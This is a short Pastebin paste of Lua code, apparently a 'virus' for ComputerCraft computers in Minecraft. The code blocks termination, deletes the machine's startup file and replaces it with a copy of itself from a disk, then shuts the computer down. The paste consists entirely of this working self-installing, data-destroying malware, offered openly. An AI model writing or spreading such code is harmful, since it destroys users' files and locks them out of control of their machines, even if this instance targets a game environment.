Advertisement
craftxbox

CC Virus File 1

Aug 5th, 2013
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --Made by craftxbox
  2. --Version 0.3
  3. os.pullEvent = os.pullEventRaw
  4. term.clear()
  5. print("This computer has a virus.Shutting down")
  6. sleep(5)
  7. if fs.exists ("startup") == true then
  8. fs.delete("startup")
  9. fs.copy("disk/VIRUS","startup")
  10. os.shutdown()
  11. else
  12. fs.copy("disk/VIRUS","startup")
  13. sleep(2)
  14. os.shutdown()
  15. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement